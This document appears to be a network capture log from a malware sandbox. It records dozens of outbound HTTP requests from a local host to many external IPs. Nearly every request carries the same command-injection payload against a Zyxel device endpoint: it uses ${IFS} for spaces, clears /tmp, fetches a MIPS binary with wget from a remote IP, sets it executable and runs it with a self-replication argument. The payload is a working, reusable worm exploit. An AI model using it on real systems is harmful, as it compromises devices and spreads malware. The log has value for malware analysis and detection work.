                                                      Feb 2, 2024 06:35:43.420804024 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1963192.168.2.1453800150.100.91.86443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420841932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1964192.168.2.1449616118.88.89.227443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420892000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1965192.168.2.1451466123.67.177.100443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420934916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1966192.168.2.1446150147.104.174.19443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.420977116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1967192.168.2.1438800180.142.109.179443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421020031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1968192.168.2.1438728115.24.109.9443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421066046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1969192.168.2.1459594103.144.183.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421108961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1970192.168.2.1451332192.102.8.215443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421159983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1971192.168.2.1435426123.206.25.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421197891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1972192.168.2.1436822157.25.7.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421227932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1973192.168.2.1446776163.201.90.124443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421293020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1974192.168.2.1450562181.30.2.45443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421320915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1975192.168.2.1455528200.5.84.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421370029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1976192.168.2.1445244116.60.223.242443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421400070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1977192.168.2.1440230184.22.75.110443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421456099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1978192.168.2.1439452186.38.91.57443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421504021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1979192.168.2.1436624120.9.247.131443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421525002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1980192.168.2.1456936113.42.110.64443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421561003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1981192.168.2.1444022222.163.183.78443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421601057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1982192.168.2.144987485.23.202.24443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421652079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1983192.168.2.1458306125.230.157.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421695948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1984192.168.2.145129045.19.152.152443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421741009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1985192.168.2.1457158111.217.85.122443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421789885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1986192.168.2.14348048.83.97.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421828985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1987192.168.2.144933059.91.80.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421860933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1988192.168.2.14456482.146.251.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421914101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1989192.168.2.1435244223.75.170.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.421974897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1990192.168.2.1433324178.62.142.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422008038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1991192.168.2.1438262179.207.242.178443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422038078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1992192.168.2.1453638163.185.189.169443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422040939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1993192.168.2.1445970147.187.99.50443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422091007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1994192.168.2.144559881.235.58.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422118902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1995192.168.2.145189252.233.194.154443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422152042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1996192.168.2.144407420.228.19.183443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422193050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1997192.168.2.1448550153.122.120.28443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422250986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1998192.168.2.1434284137.171.194.224443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422302961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      1999192.168.2.146040486.6.67.229443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422327995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2000192.168.2.145097874.163.212.25443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422369003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2001192.168.2.145896657.163.64.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422425032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2002192.168.2.1449844119.153.155.22443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422447920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2003192.168.2.144822442.139.112.59443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422487020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2004192.168.2.14441042.145.251.109443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422542095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2005192.168.2.1446762149.199.21.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422574043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2006192.168.2.1458624151.208.187.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422662973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2007192.168.2.1434986163.97.251.231443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422699928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2008192.168.2.143499092.15.126.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422699928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2009192.168.2.1447884142.50.232.219443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422736883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2010192.168.2.1453656130.226.85.65443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422787905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2011192.168.2.1442556120.131.240.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422843933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2012192.168.2.1446516211.229.200.137443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422872066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2013192.168.2.144033636.202.163.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422897100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2014192.168.2.1460218143.100.231.232443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422930956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2015192.168.2.1441250164.173.227.209443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.422966957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2016192.168.2.1459240221.82.186.91443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423037052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2017192.168.2.1458700107.141.155.198443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423088074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2018192.168.2.144144246.199.32.147443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423125982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2019192.168.2.1460990211.22.220.54443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423193932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2020192.168.2.1436906130.66.211.81443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423233032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2021192.168.2.1458024163.21.99.141443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423279047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2022192.168.2.1446178118.61.68.83443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423319101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2023192.168.2.1436086184.97.199.216443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423367023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2024192.168.2.1445680120.180.230.203443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:35:43.423430920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      2025192.168.2.1445842161.55.162.44443
                                                      TimestampBytes transferredDirectionData
